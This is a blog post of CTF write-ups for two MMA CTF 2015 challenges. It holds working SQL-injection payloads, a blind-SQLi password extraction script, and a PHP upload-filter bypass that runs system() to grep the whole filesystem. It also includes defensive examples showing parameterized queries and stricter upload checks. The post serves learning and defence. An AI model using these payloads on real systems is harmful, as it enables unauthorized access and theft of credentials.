
Sunday, September 6, 2015

MMA CTF 2015 - Login as admin! (30)

For this challenge I took an approach that was probably over-engineered: I used blind SQL injection to recover the admin user's password one character at a time.


You can login with 'test/test' credentials, which gives you this output:
You are test user.
logout

Let's try logging in as the admin user.

I initially tried a simple SQL injection, and it worked immediately:
Username: admin' --
The response told us we needed to go further and recover the user's password:
Congratulations!!
You are admin user.
The flag is your password!
logout

This worked without setting the password field at all, which makes things easy. I didn't want to attempt dumping the password or joining it onto the username, so instead I went the blind SQLi route. The login page answers with an "invalid" message whenever the injected condition is false, which gives us a yes/no oracle. I first confirmed the oracle by running:
admin' and password like '%' --
> Success!
admin' and password like 'MMA{%' --
> Success!
admin' and password like 'abcd%' --
> Failure, as expected.

Now that we have that out of the way, let's write a python client!
import string
import requests

url = "http://arrive.chal.mmactf.link/login.cgi"
# Injected through the username field; the LIKE pattern is filled in per guess.
injection = "admin' and password like '{}' --"

# Only lowercase letters are guessed. For positions holding anything else,
# '_' is appended instead: it is the LIKE single-character wildcard, so the
# prefix keeps matching and the search moves on to the next position. Those
# positions show up as '_' in the printed result and have to be read as such.
allChars = string.ascii_lowercase

solution = "MMA{"

def found(c):
  print("Found! :: {}".format(c))
  print(solution)

while len(solution) < 80:
  # Stop once the pattern without a trailing '%' matches on its own: the
  # whole password is covered (wildcards still stand for non-lowercase chars).
  exact = requests.post(url, data={"username": injection.format(solution)}).text
  if 'invalid' not in exact:
    break
  for c in allChars:
    print('Attempt: {}'.format(c))
    # The page contains 'invalid' whenever the LIKE condition is false.
    content = requests.post(url, data={
      "username": injection.format(solution + c + "%")
    }).text
    if 'invalid' not in content:
      solution += c
      found(c)
      break
    elif c == 'z':
      solution += '_'
      found('_')


After a few cycles, this prints out:
  MMA{cats_alice_band}
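To show why the probes above work at all, here is an added example (not the challenge's code, and not part of the original post) that models the login check two ways against an in-memory SQLite table. The user table and the admin password are constructed sample data, with a placeholder in the flag format rather than the real flag. `login_vulnerable` builds the query by string formatting, which is the defect the challenge exhibits; `login_parameterized` binds the same inputs as parameters, so the quote and the `--` comment marker are just bytes in a string and the LIKE oracle returns nothing.

```python
import sqlite3

# Constructed sample data standing in for the challenge backend. The admin
# password is a placeholder in the flag format, not the real flag.
USERS = [("test", "test"), ("admin", "MMA{placeholder_not_the_real_flag}")]


def make_db():
    """Fresh in-memory database with the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(username, password):
    """Query built by string formatting, the pattern the challenge exhibits.
    Returns the matched username, or None (the page's 'invalid' case)."""
    conn = make_db()
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    # With username = "admin' --" the tail "' AND password = ''" is commented out.
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(username, password):
    """Same check with bound parameters: the input is data, never SQL."""
    conn = make_db()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def like_oracle(login, prefix):
    """One step of the writeup's blind probe: does the admin password start
    with `prefix`? `login` is whichever login function is under test."""
    payload = "admin' and password like '%s%%' --" % prefix
    return login(payload, "") == "admin"


if __name__ == "__main__":
    print("test/test           ->", login_vulnerable("test", "test"))
    print("admin' -- (vuln)    ->", login_vulnerable("admin' --", ""))
    print("admin' -- (param)   ->", login_parameterized("admin' --", ""))
    for prefix in ("MMA{", "abcd"):
        print("prefix %-5r vuln=%s param=%s" % (
            prefix, like_oracle(login_vulnerable, prefix),
            like_oracle(login_parameterized, prefix)))
```

In access logs the tell for this kind of probing is a username value carrying a quote followed by `--` and a burst of near-identical requests differing by one character, but logging only detects it; the fix is the parameterized form.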

MMA 1st CTF 2015 - Uploader (100)


This was one I went back and forth on. The CTF featured a few LFI vulnerabilities across its challenges; this one was purely focused on a single one.
The description looked something like this:

This uploader deletes all /<\?|php/. So you cannot run php.

http://recocta.chal.mmactf.link:9080/
http://recocta.chal.mmactf.link:9081/ (Mirror 1)
http://recocta.chal.mmactf.link:9082/ (Mirror 2)
http://recocta.chal.mmactf.link:9083/ (Mirror 3)
You can only upload files whose name is matched by /^[a-zA-Z0-9]+\.[a-zA-Z0-9]+$/.


So it sanitizes the content of your upload by deleting every "<?" and every "php". That rules out both "<?php" and the short "<?" tag as a way to start PHP interpretation.

At first I tried a few different variations on those opening tokens, with spaces, escapes, HTML entities and so on.

If you look up PHP's opening tags, you'll find an alternative one written as an HTML script tag (it was removed in PHP 7, which is what this RFC is about): https://wiki.php.net/rfc/remove_alternative_php_tags

So now we can write a file such as this:
<script language=php> echo "testing"; </script>
The file didn't parse correctly, but that is because the lowercase "php" inside the tag was stripped, exactly as the regex predicts.

Let's try capitalizing it so it reads:
<script language=PHP> echo "testing"; </script>

Sure enough, we upload this, and it works!
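The filter fails for one reason: /<\?|php/ is case-sensitive while PHP 5 recognised `<script language=PHP>` case-insensitively. The following is an added example, not the challenge's code, that reproduces the quoted filter in Python next to the same pattern with the `re.I` flag, and checks what survives against an approximation of the openers PHP 5 accepted (`<?` and the script tag; the `PHP_OPENER` regex is my assumption, not PHP's lexer). It also applies the description's filename rule, which happily accepts `.php`, beside an assumed extension allowlist.

```python
import re

# The upload filter as quoted in the challenge description: every match of
# /<\?|php/ is deleted. Written without the 'i' flag, it is case-sensitive.
CHALLENGE_FILTER = re.compile(r"<\?|php")

# Added variant: the same filter with the case-insensitive flag, which is all
# it would have taken to catch '<script language=PHP>'.
CASE_INSENSITIVE_FILTER = re.compile(r"<\?|php", re.I)

# Approximation of the openers PHP 5 recognised: '<?' (covers '<?php') and the
# alternative '<script language=php>' tag, both case-insensitive. This is an
# assumption for the demonstration, not PHP's actual lexer rule.
PHP_OPENER = re.compile(
    r"<\?|<script\s+language\s*=\s*(?:php|\"php\"|'php')\s*>", re.I)

# Filename rule from the description, and an assumed extension allowlist that
# a hardened uploader would enforce on top of it.
FILENAME_RE = re.compile(r"^[a-zA-Z0-9]+\.[a-zA-Z0-9]+$")
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "txt"}


def challenge_sanitize(content):
    """Content after the challenge's case-sensitive filter."""
    return CHALLENGE_FILTER.sub("", content)


def case_insensitive_sanitize(content):
    """Content after the same filter run with re.I."""
    return CASE_INSENSITIVE_FILTER.sub("", content)


def php_opener_present(content):
    """True if the (sanitized) content still contains a PHP opening tag."""
    return PHP_OPENER.search(content) is not None


def challenge_filename_ok(name):
    """The description's filename rule: any alphanumeric extension passes."""
    return FILENAME_RE.match(name) is not None


def allowlisted_filename_ok(name):
    """Filename rule plus an extension allowlist; '.php' is rejected outright."""
    if not FILENAME_RE.match(name):
        return False
    return name.rsplit(".", 1)[1].lower() in ALLOWED_EXT


if __name__ == "__main__":
    # Constructed sample uploads: the two payloads from the writeup.
    samples = {
        "lowercase": '<script language=php> echo "testing"; </script>',
        "uppercase": '<script language=PHP> echo "testing"; </script>',
    }
    for label, payload in samples.items():
        after = challenge_sanitize(payload)
        print(f"{label}: challenge filter -> {after!r}; opener left: {php_opener_present(after)}")
        after = case_insensitive_sanitize(payload)
        print(f"{label}: re.I filter      -> {after!r}; opener left: {php_opener_present(after)}")
    for name in ("cat.png", "shell.php"):
        print(f"{name}: description rule {challenge_filename_ok(name)}, "
              f"allowlist {allowlisted_filename_ok(name)}")
```

Even with `re.I` this remains a blocklist on file contents, and blocklists keep losing to the next encoding or alternative syntax. The durable controls are the allowlist on extension and, above all, storing uploads where the web server will never hand them to the PHP interpreter.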

Now we need to do something more important with the payload we upload. Let's try finding the flag! Grep should do the trick!
<script language=PHP> echo system("egrep -rnis 'MMA\{' /"); </script>

Using 'MMA{' as the prefix to the flag seemed like a safe bet, searching all files starting from root.

/flag:1:MMA{you can run php from script tag}

Flag: MMA{you can run php from script tag}